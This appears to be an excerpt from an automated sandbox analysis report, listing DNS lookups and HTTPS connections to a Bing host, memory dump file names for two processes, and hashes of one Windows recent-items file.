US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp
US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp
US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp
US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp
US | 8.8.8.8:53 | tse1.mm.bing.net | udp
US | 150.171.27.10:443 | tse1.mm.bing.net | tcp
US | 150.171.27.10:443 | tse1.mm.bing.net | tcp
US | 150.171.27.10:443 | tse1.mm.bing.net | tcp
US | 150.171.27.10:443 | tse1.mm.bing.net | tcp
US | 150.171.27.10:443 | tse1.mm.bing.net | tcp

Files

memory/1408-0-0x00007FF8161F0000-0x00007FF816200000-memory.dmp

memory/1408-1-0x00007FF85620D000-0x00007FF85620E000-memory.dmp

memory/1408-2-0x00007FF8161F0000-0x00007FF816200000-memory.dmp

memory/1408-5-0x00007FF8161F0000-0x00007FF816200000-memory.dmp

memory/1408-6-0x00007FF856170000-0x00007FF856365000-memory.dmp

memory/1408-4-0x00007FF8161F0000-0x00007FF816200000-memory.dmp

memory/1408-9-0x00007FF856170000-0x00007FF856365000-memory.dmp

memory/1408-8-0x00007FF856170000-0x00007FF856365000-memory.dmp

memory/1408-12-0x00007FF856170000-0x00007FF856365000-memory.dmp

memory/1408-13-0x00007FF813C60000-0x00007FF813C70000-memory.dmp

memory/1408-11-0x00007FF856170000-0x00007FF856365000-memory.dmp

memory/1408-10-0x00007FF856170000-0x00007FF856365000-memory.dmp

memory/1408-16-0x00007FF856170000-0x00007FF856365000-memory.dmp

memory/1408-19-0x00007FF813C60000-0x00007FF813C70000-memory.dmp

memory/1408-21-0x00007FF856170000-0x00007FF856365000-memory.dmp

memory/1408-20-0x00007FF856170000-0x00007FF856365000-memory.dmp

memory/1408-18-0x00007FF856170000-0x00007FF856365000-memory.dmp

memory/1408-17-0x00007FF856170000-0x00007FF856365000-memory.dmp

memory/1408-15-0x00007FF856170000-0x00007FF856365000-memory.dmp

memory/1408-14-0x00007FF856170000-0x00007FF856365000-memory.dmp

memory/1408-7-0x00007FF856170000-0x00007FF856365000-memory.dmp

memory/1408-3-0x00007FF8161F0000-0x00007FF816200000-memory.dmp

memory/4736-38-0x00007FF856170000-0x00007FF856365000-memory.dmp

memory/4736-44-0x00007FF856170000-0x00007FF856365000-memory.dmp

memory/1408-46-0x00007FF856170000-0x00007FF856365000-memory.dmp

memory/1408-47-0x00007FF85620D000-0x00007FF85620E000-memory.dmp

memory/4736-51-0x00007FF856170000-0x00007FF856365000-memory.dmp

memory/4736-52-0x00007FF72C490000-0x00007FF72C498000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 5bdcc76a93dd695f2e24fd442134a395
SHA1 fcae6e8d16accd2a540699cbd1293dcd8c48ef25
SHA256 b8a910938f0920c50c3acca17f99288ae0c95c010e75f42c6d2eb7db82a46033
SHA512 b5b2f9e1b0522c410e7ec513531221ec68093b6f1738ffcffb7f2bb1e73a778d4b46249a3f6d530033a369b957a399655278cb75d5333c4247ae3367d797ffa2

memory/1408-86-0x00007FF8161F0000-0x00007FF816200000-memory.dmp

memory/1408-85-0x00007FF8161F0000-0x00007FF816200000-memory.dmp

memory/1408-87-0x00007FF8161F0000-0x00007FF816200000-memory.dmp

memory/1408-84-0x00007FF8161F0000-0x00007FF816200000-memory.dmp

memory/1408-88-0x00007FF856170000-0x00007FF856365000-memory.dmp